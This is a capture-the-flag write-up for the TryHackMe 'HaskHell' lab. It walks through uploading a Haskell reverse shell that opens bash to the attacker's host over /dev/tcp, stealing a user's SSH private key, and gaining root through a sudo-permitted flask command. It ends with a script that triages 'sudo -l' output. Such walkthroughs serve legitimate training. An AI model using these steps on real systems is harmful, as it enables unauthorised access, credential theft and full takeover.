Try Hack Me: HaskHell

DebianHat
4 min read, Aug 27, 2020
  1. Introduction
  2. Scanning
  3. Enumeration
  4. Exploitation
  5. Capture the Flags

Introduction

HaskHell is another boot2root box; it needs a little enumeration and some enthusiasm for exploring new things.

Haskell is the thing to explore for the initial foothold. For those without prior knowledge of it, Haskell is a purely functional programming language.
The other thing needed is a bit of Python, which gets us to the root user, and SSH is the bridge between the two.

Scanning

Let's get onto the box and start with an initial nmap scan (service detection plus default scripts).
nmap -v -sV -sC <ip-addr>

Nmap gives us 2 open ports: port 22 (SSH) and port 5001 (Gunicorn).
Gunicorn is a Python WSGI server, so seeing it on a port tells us that a Python-based web application (typically Flask or Django) is hosted behind it.

Enumeration

Walking through the web page we find some interesting things.
1. The functional programming language Haskell.
2. An upload section, where uploaded files are automatically executed. So let's get a Haskell reverse shell, so that we can have a shell connection back to our machine.

But the page linked from there is not available.

Hmm!! Stuck at this point: we couldn't find any upload section on the page, so let's look for hidden directories, if any exist.

Holla!! There we go: “submit” is the one we are looking for.

Exploitation

Let's upload a reverse-shell script and get an initial shell on our machine. Start a netcat listener on <lport> first, then upload the following Haskell program; since the server compiles and runs whatever is uploaded, its main action connects bash back to us.

import System.Process (callCommand)

-- The server runs the uploaded program; callCommand hands the string to /bin/sh,
-- which starts an interactive bash with stdin/stdout/stderr on our listener.
main :: IO ()
main = callCommand "bash -c 'bash -i >& /dev/tcp/<ip-addr>/<lport> 0>&1'"

Boom, here we have the shell. Heading to /home and looking through the users' files, we find the user flag in one of the home directories.

Furthermore, since we know port 22 is open, we'll try to get SSH credentials, or an id_rsa private key, for the user prof.

The more you enumerate, the more you succeed. Here we go: we found an SSH id_rsa file. We copied its contents into a file on our own system.

Restrict the key file's permissions so ssh accepts it (it refuses private keys readable by other users), then connect:

chmod 600 <id_rsa_file>

ssh -i <id_rsa_file> prof@<machine-ip>

Done with that, we are now a more privileged user, “prof”.

Check whether any sudo operation is allowed for this user.
And there is one; have a look at the image below.

Here we can see that flask is the one sudo operation we can run from this user, and we know flask is a Python framework. The important detail is that `flask run` imports the module named by the FLASK_APP environment variable and executes its top-level code, so whatever we put in that module runs as root.
So let's write a Python script that gets us a root shell. Save the following as exploit.py:

# exploit.py: imported by `flask run`, so this top-level code runs as root under sudo
import pty
pty.spawn("/bin/bash")

Then point flask at it and run it through sudo:

export FLASK_APP=exploit.py

sudo /usr/bin/flask run

One caveat: sudo's default env_reset drops FLASK_APP unless the rule carries SETENV or env_keep lists it (`sudo -l` shows both). If that happens, `flask run` with no FLASK_APP set falls back to loading app.py or wsgi.py from the current directory, so naming the script app.py works just as well.

TAAAADDDDAAA, we are prompted with a root shell.
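The write-up shows the `sudo -l` result only as a screenshot. Below is an added example, written for this page and not code from the original post, of the triage a practitioner does on that output: it parses the rules and flags any that hand a low-privileged user code execution as root, such as a sudo-able flask. SAMPLE_SUDO_L is constructed to resemble the rule in the screenshot (the exact text on the box is in that image and not reproduced here), and the list of code-loading binaries is an illustrative assumption, not a complete catalogue.

```python
"""Triage `sudo -l` output for rules that amount to code execution as root.

Added example for this write-up, not code from the original post. SAMPLE_SUDO_L
is constructed; CODE_LOADERS is an illustrative assumption, not a full list
(GTFOBins has the fuller catalogue).
"""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Binaries that execute code the caller supplies (a file, an environment
# variable or a command-line string), so `sudo <binary>` is effectively root.
CODE_LOADERS = {
    "flask": "imports the module named by FLASK_APP (or app.py/wsgi.py in cwd) on `flask run`",
    "gunicorn": "imports the WSGI module given on its command line",
    "python": "runs any script or -c string",
    "python3": "runs any script or -c string",
    "perl": "runs any script or -e string",
    "ruby": "runs any script or -e string",
    "node": "runs any script or -e string",
}

# Constructed sample; the second rule is a harmless control.
SAMPLE_SUDO_L = """\
Matching Defaults entries for prof on haskhell:
    env_reset, mail_badpass

User prof may run the following commands on haskhell:
    (ALL) NOPASSWD: /usr/bin/flask
    (root) /usr/bin/id
"""

# "(runas) TAG: TAG: /path/to/cmd args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


@dataclass
class Finding:
    rule: str
    binary: str
    reasons: List[str] = field(default_factory=list)


def parse_rules(sudo_l_output: str) -> List[Tuple[str, str, str]]:
    """Return (runas, tags, command) for each rule under 'User ... may run'."""
    rules, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append((m["runas"], m["tags"].strip(), m["cmd"].strip()))
    return rules


def triage(sudo_l_output: str) -> List[Finding]:
    """Flag rules worth a second look; an empty list means nothing obvious."""
    env_reset = "env_reset" in sudo_l_output
    findings = []
    for runas, tags, cmd in parse_rules(sudo_l_output):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        reasons = []
        if binary in CODE_LOADERS:
            reasons.append(f"{binary} {CODE_LOADERS[binary]}")
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        if "SETENV" in tags:
            reasons.append("caller may override the environment")
        elif env_reset and binary == "flask":
            reasons.append("env_reset is on: FLASK_APP is dropped unless env_keep lists it; use app.py in cwd")
        if "*" in cmd:
            reasons.append("wildcard in the argument list")
        if reasons:
            rule = " ".join(p for p in (f"({runas})", tags, cmd) if p)
            findings.append(Finding(rule, binary, reasons))
    return findings


if __name__ == "__main__":
    # Pipe live output in (hypothetical file name): sudo -l | python3 sudo_triage.py
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SUDO_L
    for f in triage(text):
        print(f.rule)
        for r in f.reasons:
            print("   -", r)
```

The parser only looks below the "User ... may run" line, so the Defaults block is read for env_reset but never mistaken for a rule; the env_reset reason is what tells you, before running anything, whether the `export FLASK_APP=...` step will survive sudo.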


DebianHat

Penetration Tester, Ethical Hacker, Security Analyst